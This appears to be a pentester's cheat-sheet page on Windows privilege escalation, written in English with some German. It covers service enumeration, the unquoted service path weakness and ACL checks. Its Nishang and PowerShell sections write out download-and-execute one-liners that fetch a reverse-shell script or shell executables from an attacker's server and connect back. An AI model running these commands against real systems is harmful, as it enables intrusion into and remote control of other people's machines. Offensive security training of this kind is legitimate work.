Windows

Service

Service Information

sc qc <service-name>

Start / stop windows service

sc start/stop <service-name>

List all services

sc queryex type= service state= all

List all services with binpath (powershell)

Get-WmiObject win32_service | select Name, DisplayName, State, PathName | sort State

Where State -eq "Running"

File

Display ACL of a file

icacls <file>

Unquoted Service Path

C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe

In order to run SomeExecutable.exe, the system will interpret this path in the following order from 1 to 5.

C:\Program.exe
C:\Program Files\A.exe
C:\Program Files\A Subfolder\B.exe
C:\Program Files\A Subfolder\B Subfolder\C.exe
C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe

source: below (sehr empfehlenswert zu lesen)

Windows Privilege Escalation — Part 1 (Unquoted Service Path)Medium

Check Unquoted Service Path

wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\" |findstr /i /v """

Welche Gruppe befindet sich der user

whoami /groups

Privilegien auflisten vom Benutzer

whoami /priv

Nishang

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming.

Use the in-memory dowload and execute:

powershell iex (New-Object Net.WebClient).DownloadString('http://<yourwebserver>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]

Powershell

From the Target, download a Script provided by the attacker and execute it

powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/shell-name.exe','shell-name.exe')"

powershell Invoke-WebRequest -Uri http://10.8.30.155:1337/reverse.exe -Outfile reverse.exe

Start files from CMD

START file.exe

PreviousHash cracking Nexthydra

Last updated 4 years ago